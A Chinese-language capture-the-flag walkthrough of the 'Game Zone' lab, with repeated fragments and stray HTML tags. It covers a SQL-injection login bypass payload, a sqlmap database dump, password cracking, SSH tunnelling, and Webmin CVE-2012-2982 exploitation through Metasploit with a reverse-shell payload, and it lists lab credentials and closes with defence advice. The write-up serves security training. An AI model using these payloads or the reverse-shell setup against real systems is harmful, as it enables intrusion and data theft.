Game Zone渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用nmap进行初始扫描，发现开放端口：<\/p>

22端口：SSH服务<\/li>

80端口：HTTP服务<\/li> <\/ul>

1.2 Web应用识别<\/h3>

访问80端口发现一个论坛，通过图像识别确定卡通头像为"Agent 47"。<\/p>

使用Wappalyzer识别技术栈：<\/p>

Web服务器：Apache 2.4.18<\/li>
后端语言：PHP<\/li>

操作系统：Ubuntu<\/li> <\/ul>

1.3 漏洞研究<\/h3>
检查Apache 2.4.18版本未发现已知漏洞。<\/p>

2. SQL注入攻击<\/h2>

2.1 手动SQL注入<\/h3>

发现用户登录表单存在SQL注入漏洞，使用以下payload绕过认证：<\/p>

用户名：任意（如admin）
密码：' or 1=1; --
<\/code><\/pre>
2.2 使用SQLMap自动化注入<\/h3>

使用BurpSuite拦截搜索功能请求并保存为request.txt<\/li>
执行SQLMap命令：<\/li>
<\/ol>
sqlmap -r request.txt --dbms mysql --dump
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-r<\/code>：使用保存的请求文件<\/li>
--dbms<\/code>：指定数据库类型<\/li>
--dump<\/code>：导出整个数据库<\/li>
<\/ul>
3. 密码破解<\/h2>
3.1 哈希识别<\/h3>
使用hashidentifier工具识别哈希类型为SHA-256。<\/p>
3.2 使用JohnTheRipper破解<\/h3>
john hash.txt --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt --format=<\/span>Raw-SHA256
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

hash.txt<\/code>：包含哈希值的文件<\/li>
--wordlist<\/code>：指定字典文件<\/li>
--format<\/code>：指定哈希算法<\/li>
<\/ul>
4. SSH隧道技术<\/h2>
4.1 套接字检查<\/h3>
使用ss<\/code>命令检查运行中的套接字：<\/p>
ss -tulpn
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-t<\/code>：TCP套接字<\/li>
-u<\/code>：UDP套接字<\/li>
-l<\/code>：仅监听套接字<\/li>
-n<\/code>：禁用名称解析<\/li>
-p<\/code>：显示使用套接字的进程<\/li>
<\/ul>
4.2 反向SSH隧道<\/h3>
发现被防火墙阻止的10000端口服务，使用SSH隧道本地访问：<\/p>
ssh -L 10000:localhost:10000 <username>@<ip>
<\/span><\/span><\/code><\/pre>5. SSH端口转发详解<\/h2>
5.1 正向代理(-L)<\/h3>
语法：<\/p>
ssh -L [<\/span>local_port]<\/span>:[<\/span>remote_host]<\/span>:[<\/span>remote_port]<\/span> [<\/span>username]<\/span>@[<\/span>remote_host]<\/span>
<\/span><\/span><\/code><\/pre>示例：<\/p>
ssh -L 9000:imgur.com:80 user@example.com
<\/span><\/span><\/code><\/pre>5.2 反向代理(-R)<\/h3>
语法：<\/p>
ssh -R [<\/span>remote_port]<\/span>:[<\/span>local_host]<\/span>:[<\/span>local_port]<\/span> [<\/span>username]<\/span>@[<\/span>remote_host]<\/span>
<\/span><\/span><\/code><\/pre>需要在远程服务器sshd_config中添加：<\/p>
GatewayPorts yes
<\/code><\/pre>
5.3 SOCKS5代理(-D)<\/h3>
语法：<\/p>
ssh -D [<\/span>local_port]<\/span> [<\/span>username]<\/span>@[<\/span>remote_host]<\/span>
<\/span><\/span><\/code><\/pre>示例：<\/p>
ssh -D 1080<\/span> user@example.com
<\/span><\/span><\/code><\/pre>5.4 优化参数<\/h3>
常用组合参数：<\/p>

-C<\/code>：压缩数据<\/li>
-q<\/code>：安静模式<\/li>
-T<\/code>：禁止远程分配终端<\/li>
-n<\/code>：关闭标准输入<\/li>
-N<\/code>：不执行远程命令<\/li>
-f<\/code>：后台运行<\/li>
<\/ul>
6. Webmin漏洞利用<\/h2>
6.1 漏洞识别<\/h3>
发现Webmin版本1.580，存在CVE-2012-2982漏洞。<\/p>
6.2 Metasploit利用<\/h3>

启动msfconsole<\/li>
搜索漏洞：<\/li>
<\/ol>
search webmin
<\/span><\/span>或
<\/span><\/span>search cve-2012-2982
<\/span><\/span><\/code><\/pre>
设置参数：<\/li>
<\/ol>
set username agent47
<\/span><\/span>set password videogamer124
<\/span><\/span>set rhosts 127.0.0.1
<\/span><\/span>set rport 10000<\/span>
<\/span><\/span>set payload cmd\/unix\/reverse
<\/span><\/span>set lhost <your_ip>
<\/span><\/span>set lport 4433<\/span>
<\/span><\/span>set SSL false
<\/span><\/span><\/code><\/pre>
执行exploit获取root权限<\/li>
<\/ol>
6.3 直接URL利用<\/h3>
http:\/\/localhost:10000\/file\/show.cgi\/root\/root.txt
<\/code><\/pre>
7. 关键命令速查表<\/h2>



命令<\/th>
用途<\/th>
<\/tr>
<\/thead>


' or 1=1; --<\/code><\/td>
基本SQL注入payload<\/td>
<\/tr>

sqlmap -r request.txt --dbms mysql --dump<\/code><\/td>
SQLMap数据库导出<\/td>
<\/tr>

john hash.txt --wordlist=rockyou.txt --format=Raw-SHA256<\/code><\/td>
密码破解<\/td>
<\/tr>

ss -tulpn<\/code><\/td>
检查运行中的套接字<\/td>
<\/tr>

ssh -L 10000:localhost:10000 user@ip<\/code><\/td>
本地端口转发<\/td>
<\/tr>

ssh -R 10000:localhost:10000 user@ip<\/code><\/td>
远程端口转发<\/td>
<\/tr>

ssh -D 1080 user@ip<\/code><\/td>
SOCKS5代理<\/td>
<\/tr>
<\/tbody>
<\/table>
8. 防御建议<\/h2>

对所有用户输入进行严格的验证和过滤<\/li>
使用参数化查询防止SQL注入<\/li>
及时更新Web服务器和应用程序<\/li>
使用强密码策略并定期更换密码<\/li>
限制SSH访问和端口转发功能<\/li>
定期进行安全审计和漏洞扫描<\/li>
<\/ol>

命令<\/th>	用途<\/th> <\/tr> <\/thead>
`' or 1=1; --<\/code><\/td>`	基本SQL注入payload<\/td> <\/tr>
`sqlmap -r request.txt --dbms mysql --dump<\/code><\/td>`	SQLMap数据库导出<\/td> <\/tr>
`john hash.txt --wordlist=rockyou.txt --format=Raw-SHA256<\/code><\/td>`	密码破解<\/td> <\/tr>
`ss -tulpn<\/code><\/td>`	检查运行中的套接字<\/td> <\/tr>
`ssh -L 10000:localhost:10000 user@ip<\/code><\/td>`	本地端口转发<\/td> <\/tr>
`ssh -R 10000:localhost:10000 user@ip<\/code><\/td>`	远程端口转发<\/td> <\/tr>
`ssh -D 1080 user@ip<\/code><\/td>`	SOCKS5代理<\/td> <\/tr> <\/tbody> <\/table> 8. 防御建议<\/h2> 对所有用户输入进行严格的验证和过滤<\/li> 使用参数化查询防止SQL注入<\/li> 及时更新Web服务器和应用程序<\/li> 使用强密码策略并定期更换密码<\/li> 限制SSH访问和端口转发功能<\/li> 定期进行安全审计和漏洞扫描<\/li> <\/ol>

Game Zone渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.3 漏洞研究<\/h3> 检查Apache 2.4.18版本未发现已知漏洞。<\/p>

2. SQL注入攻击<\/h2>

3. 密码破解<\/h2>

3.1 哈希识别<\/h3> 使用hashidentifier工具识别哈希类型为SHA-256。<\/p>

4. SSH隧道技术<\/h2>

5. SSH端口转发详解<\/h2>

6. Webmin漏洞利用<\/h2>

6.1 漏洞识别<\/h3> 发现Webmin版本1.580，存在CVE-2012-2982漏洞。<\/p>

1.3 漏洞研究<\/h3>
检查Apache 2.4.18版本未发现已知漏洞。<\/p>

3.1 哈希识别<\/h3>
使用hashidentifier工具识别哈希类型为SHA-256。<\/p>

6.1 漏洞识别<\/h3>
发现Webmin版本1.580，存在CVE-2012-2982漏洞。<\/p>